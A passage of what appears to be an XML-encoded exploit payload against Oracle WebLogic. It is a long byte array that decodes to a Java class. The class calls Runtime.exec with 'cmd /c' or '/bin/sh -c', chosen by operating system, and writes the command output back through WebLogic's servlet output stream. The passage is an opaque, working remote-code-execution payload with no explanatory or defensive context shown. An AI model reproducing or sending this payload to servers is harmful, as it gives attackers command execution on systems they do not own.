index=\"2237\"><byte>101</byte></void><void index=\"2238\"><byte>97</byte></void><void index=\"2239\"><byte>109</byte></void><void index=\"2240\"><byte>7</byte></void><void index=\"2241\"><byte>0</byte></void><void index=\"2242\"><byte>78</byte></void><void index=\"2243\"><byte>1</byte></void><void index=\"2244\"><byte>0</byte></void><void index=\"2245\"><byte>22</byte></void><void index=\"2246\"><byte>106</byte></void><void index=\"2247\"><byte>97</byte></void><void index=\"2248\"><byte>118</byte></void><void index=\"2249\"><byte>97</byte></void><void index=\"2250\"><byte>47</byte></void><void index=\"2251\"><byte>108</byte></void><void index=\"2252\"><byte>97</byte></void><void index=\"2253\"><byte>110</byte></void><void index=\"2254\"><byte>103</byte></void><void index=\"2255\"><byte>47</byte></void><void index=\"2256\"><byte>83</byte></void><void index=\"2257\"><byte>116</byte></void><void index=\"2258\"><byte>114</byte></void><void index=\"2259\"><byte>105</byte></void><void index=\"2260\"><byte>110</byte></void><void index=\"2261\"><byte>103</byte></void><void index=\"2262\"><byte>66</byte></void><void index=\"2263\"><byte>117</byte></void><void index=\"2264\"><byte>102</byte></void><void index=\"2265\"><byte>102</byte></void><void index=\"2266\"><byte>101</byte></void><void index=\"2267\"><byte>114</byte></void><void index=\"2268\"><byte>7</byte></void><void index=\"2269\"><byte>0</byte></void><void index=\"2270\"><byte>80</byte></void><void index=\"2271\"><byte>10</byte></void><void index=\"2272\"><byte>0</byte></void><void index=\"2273\"><byte>81</byte></void><void index=\"2274\"><byte>0</byte></void><void index=\"2275\"><byte>34</byte></void><void index=\"2276\"><byte>1</byte></void><void index=\"2277\"><byte>0</byte></void><void index=\"2278\"><byte>6</byte></void><void index=\"2279\"><byte>97</byte></void><void index=\"2280\"><byte>112</byte></void><void index=\"2281\"><byte>112</byte></void><void index=\"2282\"><byte>101</byte></void><void index=\"2283\"><byte>110</byte></void><void index=\"2284\"><byte>100</byte></void><void index=\"2285\"><byte>1</byte></void><void index=\"2286\"><byte>0</byte></void><void index=\"2287\"><byte>44</byte></void><void index=\"2288\"><byte>40</byte></void><void index=\"2289\"><byte>76</byte></void><void index=\"2290\"><byte>106</byte></void><void index=\"2291\"><byte>97</byte></void><void index=\"2292\"><byte>118</byte></void><void index=\"2293\"><byte>97</byte></void><void index=\"2294\"><byte>47</byte></void><void index=\"2295\"><byte>108</byte></void><void index=\"2296\"><byte>97</byte></void><void index=\"2297\"><byte>110</byte></void><void index=\"2298\"><byte>103</byte></void><void index=\"2299\"><byte>47</byte></void><void index=\"2300\"><byte>83</byte></void><void index=\"2301\"><byte>116</byte></void><void index=\"2302\"><byte>114</byte></void><void index=\"2303\"><byte>105</byte></void><void index=\"2304\"><byte>110</byte></void><void index=\"2305\"><byte>103</byte></void><void index=\"2306\"><byte>59</byte></void><void index=\"2307\"><byte>41</byte></void><void index=\"2308\"><byte>76</byte></void><void index=\"2309\"><byte>106</byte></void><void index=\"2310\"><byte>97</byte></void><void index=\"2311\"><byte>118</byte></void><void index=\"2312\"><byte>97</byte></void><void index=\"2313\"><byte>47</byte></void><void index=\"2314\"><byte>108</byte></void><void index=\"2315\"><byte>97</byte></void><void index=\"2316\"><byte>110</byte></void><void index=\"2317\"><byte>103</byte></void><void index=\"2318\"><byte>47</byte></void><void index=\"2319\"><byte>83</byte></void><void index=\"2320\"><byte>116</byte></void><void index=\"2321\"><byte>114</byte></void><void index=\"2322\"><byte>105</byte></void><void index=\"2323\"><byte>110</byte></void><void index=\"2324\"><byte>103</byte></void><void index=\"2325\"><byte>66</byte></void><void index=\"2326\"><byte>117</byte></void><void index=\"2327\"><byte>102</byte></void><void index=\"2328\"><byte>102</byte></void><void index=\"2329\"><byte>101</byte></void><void index=\"2330\"><byte>114</byte></void><void index=\"2331\"><byte>59</byte></void><void index=\"2332\"><byte>12</byte></void><void index=\"2333\"><byte>0</byte></void><void index=\"2334\"><byte>83</byte></void><void index=\"2335\"><byte>0</byte></void><void index=\"2336\"><byte>84</byte></void><void index=\"2337\"><byte>10</byte></void><void index=\"2338\"><byte>0</byte></void><void index=\"2339\"><byte>81</byte></void><void index=\"2340\"><byte>0</byte></void><void index=\"2341\"><byte>85</byte></void><void index=\"2342\"><byte>1</byte></void><void index=\"2343\"><byte>0</byte></void><void index=\"2344\"><byte>5</byte></void><void index=\"2345\"><byte>32</byte></void><void index=\"2346\"><byte>58</byte></void><void index=\"2347\"><byte>32</byte></void><void index=\"2348\"><byte>13</byte></void><void index=\"2349\"><byte>10</byte></void><void index=\"2350\"><byte>8</byte></void><void index=\"2351\"><byte>0</byte></void><void index=\"2352\"><byte>87</byte></void><void index=\"2353\"><byte>1</byte></void><void index=\"2354\"><byte>0</byte></void><void index=\"2355\"><byte>8</byte></void><void index=\"2356\"><byte>116</byte></void><void index=\"2357\"><byte>111</byte></void><void index=\"2358\"><byte>83</byte></void><void index=\"2359\"><byte>116</byte></void><void index=\"2360\"><byte>114</byte></void><void index=\"2361\"><byte>105</byte></void><void index=\"2362\"><byte>110</byte></void><void index=\"2363\"><byte>103</byte></void><void index=\"2364\"><byte>1</byte></void><void index=\"2365\"><byte>0</byte></void><void index=\"2366\"><byte>20</byte></void><void index=\"2367\"><byte>40</byte></void><void index=\"2368\"><byte>41</byte></void><void index=\"2369\"><byte>76</byte></void><void index=\"2370\"><byte>106</byte></void><void index=\"2371\"><byte>97</byte></void><void index=\"2372\"><byte>118</byte></void><void index=\"2373\"><byte>97</byte></void><void index=\"2374\"><byte>47</byte></void><void index=\"2375\"><byte>108</byte></void><void index=\"2376\"><byte>97</byte></void><void index=\"2377\"><byte>110</byte></void><void index=\"2378\"><byte>103</byte></void><void index=\"2379\"><byte>47</byte></void><void index=\"2380\"><byte>83</byte></void><void index=\"2381\"><byte>116</byte></void><void index=\"2382\"><byte>114</byte></void><void index=\"2383\"><byte>105</byte></void><void index=\"2384\"><byte>110</byte></void><void index=\"2385\"><byte>103</byte></void><void index=\"2386\"><byte>59</byte></void><void index=\"2387\"><byte>12</byte></void><void index=\"2388\"><byte>0</byte></void><void index=\"2389\"><byte>89</byte></void><void index=\"2390\"><byte>0</byte></void><void index=\"2391\"><byte>90</byte></void><void index=\"2392\"><byte>10</byte></void><void index=\"2393\"><byte>0</byte></void><void index=\"2394\"><byte>81</byte></void><void index=\"2395\"><byte>0</byte></void><void index=\"2396\"><byte>91</byte></void><void index=\"2397\"><byte>12</byte></void><void index=\"2398\"><byte>0</byte></void><void index=\"2399\"><byte>10</byte></void><void index=\"2400\"><byte>0</byte></void><void index=\"2401\"><byte>71</byte></void><void index=\"2402\"><byte>10</byte></void><void index=\"2403\"><byte>0</byte></void><void index=\"2404\"><byte>79</byte></void><void index=\"2405\"><byte>0</byte></void><void index=\"2406\"><byte>93</byte></void><void index=\"2407\"><byte>1</byte></void><void index=\"2408\"><byte>0</byte></void><void index=\"2409\"><byte>49</byte></void><void index=\"2410\"><byte>119</byte></void><void index=\"2411\"><byte>101</byte></void><void index=\"2412\"><byte>98</byte></void><void index=\"2413\"><byte>108</byte></void><void index=\"2414\"><byte>111</byte></void><void index=\"2415\"><byte>103</byte></void><void index=\"2416\"><byte>105</byte></void><void index=\"2417\"><byte>99</byte></void><void index=\"2418\"><byte>47</byte></void><void index=\"2419\"><byte>115</byte></void><void index=\"2420\"><byte>101</byte></void><void index=\"2421\"><byte>114</byte></void><void index=\"2422\"><byte>118</byte></void><void index=\"2423\"><byte>108</byte></void><void index=\"2424\"><byte>101</byte></void><void index=\"2425\"><byte>116</byte></void><void index=\"2426\"><byte>47</byte></void><void index=\"2427\"><byte>105</byte></void><void index=\"2428\"><byte>110</byte></void><void index=\"2429\"><byte>116</byte></void><void index=\"2430\"><byte>101</byte></void><void index=\"2431\"><byte>114</byte></void><void index=\"2432\"><byte>110</byte></void><void index=\"2433\"><byte>97</byte></void><void index=\"2434\"><byte>108</byte></void><void index=\"2435\"><byte>47</byte></void><void index=\"2436\"><byte>83</byte></void><void index=\"2437\"><byte>101</byte></void><void index=\"2438\"><byte>114</byte></void><void index=\"2439\"><byte>118</byte></void><void index=\"2440\"><byte>108</byte></void><void index=\"2441\"><byte>101</byte></void><void index=\"2442\"><byte>116</byte></void><void index=\"2443\"><byte>79</byte></void><void index=\"2444\"><byte>117</byte></void><void index=\"2445\"><byte>116</byte></void><void index=\"2446\"><byte>112</byte></void><void index=\"2447\"><byte>117</byte></void><void index=\"2448\"><byte>116</byte></void><void index=\"2449\"><byte>83</byte></void><void index=\"2450\"><byte>116</byte></void><void index=\"2451\"><byte>114</byte></void><void index=\"2452\"><byte>101</byte></void><void index=\"2453\"><byte>97</byte></void><void index=\"2454\"><byte>109</byte></void><void index=\"2455\"><byte>73</byte></void><void index=\"2456\"><byte>109</byte></void><void index=\"2457\"><byte>112</byte></void><void index=\"2458\"><byte>108</byte></void><void index=\"2459\"><byte>7</byte></void><void index=\"2460\"><byte>0</byte></void><void index=\"2461\"><byte>95</byte></void><void index=\"2462\"><byte>1</byte></void><void index=\"2463\"><byte>0</byte></void><void index=\"2464\"><byte>11</byte></void><void index=\"2465\"><byte>119</byte></void><void index=\"2466\"><byte>114</byte></void><void index=\"2467\"><byte>105</byte></void><void index=\"2468\"><byte>116</byte></void><void index=\"2469\"><byte>101</byte></void><void index=\"2470\"><byte>83</byte></void><void index=\"2471\"><byte>116</byte></void><void index=\"2472\"><byte>114</byte></void><void index=\"2473\"><byte>101</byte></void><void index=\"2474\"><byte>97</byte></void><void index=\"2475\"><byte>109</byte></void><void index=\"2476\"><byte>1</byte></void><void index=\"2477\"><byte>0</byte></void><void index=\"2478\"><byte>24</byte></void><void index=\"2479\"><byte>40</byte></void><void index=\"2480\"><byte>76</byte></void><void index=\"2481\"><byte>106</byte></void><void index=\"2482\"><byte>97</byte></void><void index=\"2483\"><byte>118</byte></void><void index=\"2484\"><byte>97</byte></void><void index=\"2485\"><byte>47</byte></void><void index=\"2486\"><byte>105</byte></void><void index=\"2487\"><byte>111</byte></void><void index=\"2488\"><byte>47</byte></void><void index=\"2489\"><byte>73</byte></void><void index=\"2490\"><byte>110</byte></void><void index=\"2491\"><byte>112</byte></void><void index=\"2492\"><byte>117</byte></void><void index=\"2493\"><byte>116</byte></void><void index=\"2494\"><byte>83</byte></void><void index=\"2495\"><byte>116</byte></void><void index=\"2496\"><byte>114</byte></void><void index=\"2497\"><byte>101</byte></void><void index=\"2498\"><byte>97</byte></void><void index=\"2499\"><byte>109</byte></void><void index=\"2500\"><byte>59</byte></void><void index=\"2501\"><byte>41</byte></void><void index=\"2502\"><byte>86</byte></void><void index=\"2503\"><byte>12</byte></void><void index=\"2504\"><byte>0</byte></void><void index=\"2505\"><byte>97</byte></void><void index=\"2506\"><byte>0</byte></void><void index=\"2507\"><byte>98</byte></void><void index=\"2508\"><byte>10</byte></void><void index=\"2509\"><byte>0</byte></void><void index=\"2510\"><byte>96</byte></void><void index=\"2511\"><byte>0</byte></void><void index=\"2512\"><byte>99</byte></void><void index=\"2513\"><byte>1</byte></void><void index=\"2514\"><byte>0</byte></void><void index=\"2515\"><byte>5</byte></void><void index=\"2516\"><byte>102</byte></void><void index=\"2517\"><byte>108</byte></void><void index=\"2518\"><byte>117</byte></void><void index=\"2519\"><byte>115</byte></void><void index=\"2520\"><byte>104</byte></void><void index=\"2521\"><byte>12</byte></void><void index=\"2522\"><byte>0</byte></void><void index=\"2523\"><byte>101</byte></void><void index=\"2524\"><byte>0</byte></void><void index=\"2525\"><byte>11</byte></void><void index=\"2526\"><byte>10</byte></void><void index=\"2527\"><byte>0</byte></void><void index=\"2528\"><byte>96</byte></void><void index=\"2529\"><byte>0</byte></void><void index=\"2530\"><byte>102</byte></void><void index=\"2531\"><byte>1</byte></void><void index=\"2532\"><byte>0</byte></void><void index=\"2533\"><byte>7</byte></void><void index=\"2534\"><byte>111</byte></void><void index=\"2535\"><byte>115</byte></void><void index=\"2536\"><byte>46</byte></void><void index=\"2537\"><byte>110</byte></void><void index=\"2538\"><byte>97</byte></void><void index=\"2539\"><byte>109</byte></void><void index=\"2540\"><byte>101</byte></void><void index=\"2541\"><byte>8</byte></void><void index=\"2542\"><byte>0</byte></void><void index=\"2543\"><byte>104</byte></void><void index=\"2544\"><byte>1</byte></void><void index=\"2545\"><byte>0</byte></void><void index=\"2546\"><byte>16</byte></void><void index=\"2547\"><byte>106</byte></void><void index=\"2548\"><byte>97</byte></void><void index=\"2549\"><byte>118</byte></void><void index=\"2550\"><byte>97</byte></void><void index=\"2551\"><byte>47</byte></void><void index=\"2552\"><byte>108</byte></void><void index=\"2553\"><byte>97</byte></void><void index=\"2554\"><byte>110</byte></void><void index=\"2555\"><byte>103</byte></void><void index=\"2556\"><byte>47</byte></void><void index=\"2557\"><byte>83</byte></void><void index=\"2558\"><byte>121</byte></void><void index=\"2559\"><byte>115</byte></void><void index=\"2560\"><byte>116</byte></void><void index=\"2561\"><byte>101</byte></void><void index=\"2562\"><byte>109</byte></void><void index=\"2563\"><byte>7</byte></void><void index=\"2564\"><byte>0</byte></void><void index=\"2565\"><byte>106</byte></void><void index=\"2566\"><byte>1</byte></void><void index=\"2567\"><byte>0</byte></void><void index=\"2568\"><byte>11</byte></void><void index=\"2569\"><byte>103</byte></void><void index=\"2570\"><byte>101</byte></void><void index=\"2571\"><byte>116</byte></void><void index=\"2572\"><byte>80</byte></void><void index=\"2573\"><byte>114</byte></void><void index=\"2574\"><byte>111</byte></void><void index=\"2575\"><byte>112</byte></void><void index=\"2576\"><byte>101</byte></void><void index=\"2577\"><byte>114</byte></void><void index=\"2578\"><byte>116</byte></void><void index=\"2579\"><byte>121</byte></void><void index=\"2580\"><byte>12</byte></void><void index=\"2581\"><byte>0</byte></void><void index=\"2582\"><byte>108</byte></void><void index=\"2583\"><byte>0</byte></void><void index=\"2584\"><byte>59</byte></void><void index=\"2585\"><byte>10</byte></void><void index=\"2586\"><byte>0</byte></void><void index=\"2587\"><byte>107</byte></void><void index=\"2588\"><byte>0</byte></void><void index=\"2589\"><byte>109</byte></void><void index=\"2590\"><byte>1</byte></void><void index=\"2591\"><byte>0</byte></void><void index=\"2592\"><byte>16</byte></void><void index=\"2593\"><byte>106</byte></void><void index=\"2594\"><byte>97</byte></void><void index=\"2595\"><byte>118</byte></void><void index=\"2596\"><byte>97</byte></void><void index=\"2597\"><byte>47</byte></void><void index=\"2598\"><byte>108</byte></void><void index=\"2599\"><byte>97</byte></void><void index=\"2600\"><byte>110</byte></void><void index=\"2601\"><byte>103</byte></void><void index=\"2602\"><byte>47</byte></void><void index=\"2603\"><byte>83</byte></void><void index=\"2604\"><byte>116</byte></void><void index=\"2605\"><byte>114</byte></void><void index=\"2606\"><byte>105</byte></void><void index=\"2607\"><byte>110</byte></void><void index=\"2608\"><byte>103</byte></void><void index=\"2609\"><byte>7</byte></void><void index=\"2610\"><byte>0</byte></void><void index=\"2611\"><byte>111</byte></void><void index=\"2612\"><byte>1</byte></void><void index=\"2613\"><byte>0</byte></void><void index=\"2614\"><byte>11</byte></void><void index=\"2615\"><byte>116</byte></void><void index=\"2616\"><byte>111</byte></void><void index=\"2617\"><byte>76</byte></void><void index=\"2618\"><byte>111</byte></void><void index=\"2619\"><byte>119</byte></void><void index=\"2620\"><byte>101</byte></void><void index=\"2621\"><byte>114</byte></void><void index=\"2622\"><byte>67</byte></void><void index=\"2623\"><byte>97</byte></void><void index=\"2624\"><byte>115</byte></void><void index=\"2625\"><byte>101</byte></void><void index=\"2626\"><byte>12</byte></void><void index=\"2627\"><byte>0</byte></void><void index=\"2628\"><byte>113</byte></void><void index=\"2629\"><byte>0</byte></void><void index=\"2630\"><byte>90</byte></void><void index=\"2631\"><byte>10</byte></void><void index=\"2632\"><byte>0</byte></void><void index=\"2633\"><byte>112</byte></void><void index=\"2634\"><byte>0</byte></void><void index=\"2635\"><byte>114</byte></void><void index=\"2636\"><byte>1</byte></void><void index=\"2637\"><byte>0</byte></void><void index=\"2638\"><byte>3</byte></void><void index=\"2639\"><byte>119</byte></void><void index=\"2640\"><byte>105</byte></void><void index=\"2641\"><byte>110</byte></void><void index=\"2642\"><byte>8</byte></void><void index=\"2643\"><byte>0</byte></void><void index=\"2644\"><byte>116</byte></void><void index=\"2645\"><byte>1</byte></void><void index=\"2646\"><byte>0</byte></void><void index=\"2647\"><byte>8</byte></void><void index=\"2648\"><byte>99</byte></void><void index=\"2649\"><byte>111</byte></void><void index=\"2650\"><byte>110</byte></void><void index=\"2651\"><byte>116</byte></void><void index=\"2652\"><byte>97</byte></void><void index=\"2653\"><byte>105</byte></void><void index=\"2654\"><byte>110</byte></void><void index=\"2655\"><byte>115</byte></void><void index=\"2656\"><byte>1</byte></void><void index=\"2657\"><byte>0</byte></void><void index=\"2658\"><byte>27</byte></void><void index=\"2659\"><byte>40</byte></void><void index=\"2660\"><byte>76</byte></void><void index=\"2661\"><byte>106</byte></void><void index=\"2662\"><byte>97</byte></void><void index=\"2663\"><byte>118</byte></void><void index=\"2664\"><byte>97</byte></void><void index=\"2665\"><byte>47</byte></void><void index=\"2666\"><byte>108</byte></void><void index=\"2667\"><byte>97</byte></void><void index=\"2668\"><byte>110</byte></void><void index=\"2669\"><byte>103</byte></void><void index=\"2670\"><byte>47</byte></void><void index=\"2671\"><byte>67</byte></void><void index=\"2672\"><byte>104</byte></void><void index=\"2673\"><byte>97</byte></void><void index=\"2674\"><byte>114</byte></void><void index=\"2675\"><byte>83</byte></void><void index=\"2676\"><byte>101</byte></void><void index=\"2677\"><byte>113</byte></void><void index=\"2678\"><byte>117</byte></void><void index=\"2679\"><byte>101</byte></void><void index=\"2680\"><byte>110</byte></void><void index=\"2681\"><byte>99</byte></void><void index=\"2682\"><byte>101</byte></void><void index=\"2683\"><byte>59</byte></void><void index=\"2684\"><byte>41</byte></void><void index=\"2685\"><byte>90</byte></void><void index=\"2686\"><byte>12</byte></void><void index=\"2687\"><byte>0</byte></void><void index=\"2688\"><byte>118</byte></void><void index=\"2689\"><byte>0</byte></void><void index=\"2690\"><byte>119</byte></void><void index=\"2691\"><byte>10</byte></void><void index=\"2692\"><byte>0</byte></void><void index=\"2693\"><byte>112</byte></void><void index=\"2694\"><byte>0</byte></void><void index=\"2695\"><byte>120</byte></void><void index=\"2696\"><byte>1</byte></void><void index=\"2697\"><byte>0</byte></void><void index=\"2698\"><byte>17</byte></void><void index=\"2699\"><byte>106</byte></void><void index=\"2700\"><byte>97</byte></void><void index=\"2701\"><byte>118</byte></void><void index=\"2702\"><byte>97</byte></void><void index=\"2703\"><byte>47</byte></void><void index=\"2704\"><byte>108</byte></void><void index=\"2705\"><byte>97</byte></void><void index=\"2706\"><byte>110</byte></void><void index=\"2707\"><byte>103</byte></void><void index=\"2708\"><byte>47</byte></void><void index=\"2709\"><byte>82</byte></void><void index=\"2710\"><byte>117</byte></void><void index=\"2711\"><byte>110</byte></void><void index=\"2712\"><byte>116</byte></void><void index=\"2713\"><byte>105</byte></void><void index=\"2714\"><byte>109</byte></void><void index=\"2715\"><byte>101</byte></void><void index=\"2716\"><byte>7</byte></void><void index=\"2717\"><byte>0</byte></void><void index=\"2718\"><byte>122</byte></void><void index=\"2719\"><byte>1</byte></void><void index=\"2720\"><byte>0</byte></void><void index=\"2721\"><byte>10</byte></void><void index=\"2722\"><byte>103</byte></void><void index=\"2723\"><byte>101</byte></void><void index=\"2724\"><byte>116</byte></void><void index=\"2725\"><byte>82</byte></void><void index=\"2726\"><byte>117</byte></void><void index=\"2727\"><byte>110</byte></void><void index=\"2728\"><byte>116</byte></void><void index=\"2729\"><byte>105</byte></void><void index=\"2730\"><byte>109</byte></void><void index=\"2731\"><byte>101</byte></void><void index=\"2732\"><byte>1</byte></void><void index=\"2733\"><byte>0</byte></void><void index=\"2734\"><byte>21</byte></void><void index=\"2735\"><byte>40</byte></void><void index=\"2736\"><byte>41</byte></void><void index=\"2737\"><byte>76</byte></void><void index=\"2738\"><byte>106</byte></void><void index=\"2739\"><byte>97</byte></void><void index=\"2740\"><byte>118</byte></void><void index=\"2741\"><byte>97</byte></void><void index=\"2742\"><byte>47</byte></void><void index=\"2743\"><byte>108</byte></void><void index=\"2744\"><byte>97</byte></void><void index=\"2745\"><byte>110</byte></void><void index=\"2746\"><byte>103</byte></void><void index=\"2747\"><byte>47</byte></void><void index=\"2748\"><byte>82</byte></void><void index=\"2749\"><byte>117</byte></void><void index=\"2750\"><byte>110</byte></void><void index=\"2751\"><byte>116</byte></void><void index=\"2752\"><byte>105</byte></void><void index=\"2753\"><byte>109</byte></void><void index=\"2754\"><byte>101</byte></void><void index=\"2755\"><byte>59</byte></void><void index=\"2756\"><byte>12</byte></void><void index=\"2757\"><byte>0</byte></void><void index=\"2758\"><byte>124</byte></void><void index=\"2759\"><byte>0</byte></void><void index=\"2760\"><byte>125</byte></void><void index=\"2761\"><byte>10</byte></void><void index=\"2762\"><byte>0</byte></void><void index=\"2763\"><byte>123</byte></void><void index=\"2764\"><byte>0</byte></void><void index=\"2765\"><byte>126</byte></void><void index=\"2766\"><byte>1</byte></void><void index=\"2767\"><byte>0</byte></void><void index=\"2768\"><byte>7</byte></void><void index=\"2769\"><byte>99</byte></void><void index=\"2770\"><byte>109</byte></void><void index=\"2771\"><byte>100</byte></void><void index=\"2772\"><byte>32</byte></void><void index=\"2773\"><byte>47</byte></void><void index=\"2774\"><byte>99</byte></void><void index=\"2775\"><byte>32</byte></void><void index=\"2776\"><byte>8</byte></void><void index=\"2777\"><byte>0</byte></void><void index=\"2778\"><byte>-128</byte></void><void index=\"2779\"><byte>1</byte></void><void index=\"2780\"><byte>0</byte></void><void index=\"2781\"><byte>4</byte></void><void index=\"2782\"><byte>101</byte></void><void index=\"2783\"><byte>120</byte></void><void index=\"2784\"><byte>101</byte></void><void index=\"2785\"><byte>99</byte></void><void index=\"2786\"><byte>1</byte></void><void index=\"2787\"><byte>0</byte></void><void index=\"2788\"><byte>39</byte></void><void index=\"2789\"><byte>40</byte></void><void index=\"2790\"><byte>76</byte></void><void index=\"2791\"><byte>106</byte></void><void index=\"2792\"><byte>97</byte></void><void index=\"2793\"><byte>118</byte></void><void index=\"2794\"><byte>97</byte></void><void index=\"2795\"><byte>47</byte></void><void index=\"2796\"><byte>108</byte></void><void index=\"2797\"><byte>97</byte></void><void index=\"2798\"><byte>110</byte></void><void index=\"2799\"><byte>103</byte></void><void index=\"2800\"><byte>47</byte></void><void index=\"2801\"><byte>83</byte></void><void index=\"2802\"><byte>116</byte></void><void index=\"2803\"><byte>114</byte></void><void index=\"2804\"><byte>105</byte></void><void index=\"2805\"><byte>110</byte></void><void index=\"2806\"><byte>103</byte></void><void index=\"2807\"><byte>59</byte></void><void index=\"2808\"><byte>41</byte></void><void index=\"2809\"><byte>76</byte></void><void index=\"2810\"><byte>106</byte></void><void index=\"2811\"><byte>97</byte></void><void index=\"2812\"><byte>118</byte></void><void index=\"2813\"><byte>97</byte></void><void index=\"2814\"><byte>47</byte></void><void index=\"2815\"><byte>108</byte></void><void index=\"2816\"><byte>97</byte></void><void index=\"2817\"><byte>110</byte></void><void index=\"2818\"><byte>103</byte></void><void index=\"2819\"><byte>47</byte></void><void index=\"2820\"><byte>80</byte></void><void index=\"2821\"><byte>114</byte></void><void index=\"2822\"><byte>111</byte></void><void index=\"2823\"><byte>99</byte></void><void index=\"2824\"><byte>101</byte></void><void index=\"2825\"><byte>115</byte></void><void index=\"2826\"><byte>115</byte></void><void index=\"2827\"><byte>59</byte></void><void index=\"2828\"><byte>12</byte></void><void index=\"2829\"><byte>0</byte></void><void index=\"2830\"><byte>-126</byte></void><void index=\"2831\"><byte>0</byte></void><void index=\"2832\"><byte>-125</byte></void><void index=\"2833\"><byte>10</byte></void><void index=\"2834\"><byte>0</byte></void><void index=\"2835\"><byte>123</byte></void><void index=\"2836\"><byte>0</byte></void><void index=\"2837\"><byte>-124</byte></void><void index=\"2838\"><byte>1</byte></void><void index=\"2839\"><byte>0</byte></void><void index=\"2840\"><byte>11</byte></void><void index=\"2841\"><byte>47</byte></void><void index=\"2842\"><byte>98</byte></void><void index=\"2843\"><byte>105</byte></void><void index=\"2844\"><byte>110</byte></void><void index=\"2845\"><byte>47</byte></void><void index=\"2846\"><byte>115</byte></void><void index=\"2847\"><byte>104</byte></void><void index=\"2848\"><byte>32</byte></void><void index=\"2849\"><byte>45</byte></void><void index=\"2850\"><byte>99</byte></void><void index=\"2851\"><byte>32</byte></void><void index=\"2852\"><byte>8</byte></void><void index=\"2853\"><byte>0</byte></void><void index=\"2854\"><byte>-122</byte></void><void index=\"2855\"><byte>1</byte></void><void index=\"2856\"><byte>0</byte></void><void index=\"2857\"><byte>22</byte></void><void index=\"2858\"><byte>106</byte></void><void index=\"2859\"><byte>97</byte></void><void index=\"2860\"><byte>118</byte></void><void index=\"2861\"><byte>97</byte></void><void index=\"2862\"><byte>47</byte></void><void index=\"2863\"><byte>105</byte></void><void index=\"2864\"><byte>111</byte></void><void index=\"2865\"><byte>47</byte></void><void index=\"2866\"><byte>66</byte></void><void index=\"2867\"><byte>117</byte></void><void index=\"2868\"><byte>102</byte></void><void index=\"2869\"><byte>102</byte></void><void index=\"2870\"><byte>101</byte></void><void index=\"2871\"><byte>114</byte></void><void index=\"2872\"><byte>101</byte></void><void index=\"2873\"><byte>100</byte></void><void index=\"2874\"><byte>82</byte></void><void index=\"2875\"><byte>101</byte></void><void index=\"2876\"><byte>97</byte></void><void index=\"2877\"><byte>100</byte></void><void index=\"2878\"><byte>101</byte></void><void index=\"2879\"><byte>114</byte></void><void index=\"2880\"><byte>7</byte></void><void index=\"2881\"><byte>0</byte></void><void index=\"2882\"><byte>-120</byte></void><void index=\"2883\"><byte>1</byte></void><void index=\"2884\"><byte>0</byte></void><void index=\"2885\"><byte>25</byte></void><void index=\"2886\"><byte>106</byte></void><void index=\"2887\"><byte>97</byte></void><void index=\"2888\"><byte>118</byte></void><void index=\"2889\"><byte>97</byte></void><void index=\"2890\"><byte>47</byte></void><void index=\"2891\"><byte>105</byte></void><void index=\"2892\"><byte>111</byte></void><void index=\"2893\"><byte>47</byte></void><void index=\"2894\"><byte>73</byte></void><void index=\"2895\"><byte>110</byte></void><void index=\"2896\"><byte>112</byte></void><void index=\"2897\"><byte>117</byte></void><void index=\"2898\"><byte>116</byte></void><void index=\"2899\"><byte>83</byte></void><void index=\"2900\"><byte>116</byte></void><void index=\"2901\"><byte>114</byte></void><void index=\"2902\"><byte>101</byte></void><void index=\"2903\"><byte>97</byte></void><void index=\"2904\"><byte>109</byte></void><void index=\"2905\"><byte>82</byte></void><void index=\"2906\"><byte>101</byte></void><void index=\"2907\"><byte>97</byte></void><void index=\"2908\"><byte>100</byte></void><void index=\"2909\"><byte>101</byte></void><void index=\"2910\"><byte>114</byte></void><void index=\"2911\"><byte>7</byte></void><void index=\"2912\"><byte>0</byte></void><void index=\"2913\"><byte>-118</byte></void><void index=\"2914\"><byte>1</byte></void><void index=\"2915\"><byte>0</byte></void><void index=\"2916\"><byte>17</byte></void><void index=\"2917\"><byte>106</byte></void><void index=\"2918\"><byte>97</byte></void><void index=\"2919\"><byte>118</byte></void><void index=\"2920\"><byte>97</byte></void><void index=\"2921\"><byte>47</byte></void><void index=\"2922\"><byte>108</byte></void><void index=\"2923\"><byte>97</byte></void><void index=\"2924\"><byte>110</byte></void><void index=\"2925\"><byte>103</byte></void><void index=\"2926\"><byte>47</byte></void><void index=\"2927\"><byte>80</byte></void><void index=\"2928\"><byte>114</byte></void><void index=\"2929\"><byte>111</byte></void><void index=\"2930\"><byte>99</byte></void><void index=\"2931\"><byte>101</byte></void><void index=\"2932\"><byte>115</byte></void><void index=\"2933\"><byte>115</byte></void><void index=\"2934\"><byte>7</byte></void><void index=\"2935\"><byte>0</byte></void><void index=\"2936\"><byte>-116</byte></void><void index=\"2937\"><byte>1</byte></void><void index=\"2938\"><byte>0</byte></void><void index=\"2939\"><byte>14</byte></void><void index=\"2940\"><byte>103</byte></void><void index=\"2941\"><byte>101</byte></void><void index=\"2942\"><byte>116</byte></void><void index=\"2943\"><byte>73</byte></void><void index=\"2944\"><byte>110</byte></void><void index=\"2945\"><byte>112</byte></void><void index=\"2946\"><byte>117</byte></void><void index=\"2947\"><byte>116</byte></void><void index=\"2948\"><byte>83</byte></void><void index=\"2949\"><byte>116</byte></void><void index=\"2950\"><byte>114</byte></void><void index=\"2951\"><byte>101</byte></void><void index=\"2952\"><byte>97</byte></void><void index=\"2953\"><byte>109</byte></void><void index=\"2954\"><byte>1</byte></void><void index=\"2955\"><byte>0</byte></void><void index=\"2956\"><byte>23</byte></void><void index=\"2957\"><byte>40</byte></void><void index=\"2958\"><byte>41</byte></void><void index=\"2959\"><byte>76</byte></void><void index=\"2960\"><byte>106</byte></void><void index=\"2961\"><byte>97</byte></void><void index=\"2962\"><byte>118</byte></void><void index=\"2963\"><byte>97</byte></void><void index=\"2964\"><byte>47</byte></void><void index=\"2965\"><byte>105</byte></void><void index=\"2966\"><byte>111</byte></void><void index=\"2967\"><byte>47</byte></void><void index=\"2968\"><byte>73</byte></void><void index=\"2969\"><byte>110</byte></void><void index=\"2970\"><byte>112</byte></void><void index=\"2971\"><byte>117</byte></void><void index=\"2972\"><byte>116</byte></void><void index=\"2973\"><byte>83</byte></void><void index=\"2974\"><byte>116</byte></void><void index=\"2975\"><byte>114</byte></void><void index=\"2976\"><byte>101</byte></void><void index=\"2977\"><byte>97</byte></void><void index=\"2978\"><byte>109</byte></void><void index=\"2979\"><byte>59</byte></void><void index=\"2980\"><byte>12</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>-114</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>-113</byte></void><void index=\"2985\"><byte>10</byte></void><void 